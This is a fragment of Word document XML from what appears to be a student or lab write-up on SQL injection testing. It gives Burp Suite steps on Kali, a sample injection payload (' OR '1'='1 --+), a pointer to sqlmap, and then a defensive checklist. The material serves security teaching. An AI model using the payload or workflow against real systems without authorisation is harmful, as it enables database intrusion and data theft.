          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>**Installation on Kali:**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>sudo apt update &amp;&amp; sudo apt install burpsuite</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>**Steps:**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>1. Configure browser proxy to 127.0.0.1:8080</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>2. Capture request with Intercept on</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>3. Send request to Repeater</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>4. Modify parameters with test payloads (' OR '1'='1 --+)</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>5. Compare responses</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>6. Export request and use with sqlmap (-r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055FDBF7" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>11) Defensive Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498638B8" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>- Use prepared statements (parameterized queries)</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- Avoid dynamic SQL concatenation</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- Implement input validation and allow-lists</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- Hash and salt passwords</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- Use least-privilege database accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- Hide detailed error messages from users</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- Implement security testing in development lifecycle</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00EA6038" w:rsidRPr="009168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716990">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1843857946">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1940672854">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1246571582">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="290718890">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1526559374">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2138209225">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1354766072">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1056395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689F"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00CD5A7C"/>
    <w:rsid w:val="00EA60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B848C"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{07D58934-C6FB-4A56-88F5-90BC87BB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22-NTU-CS-1200</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-15T11:16:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>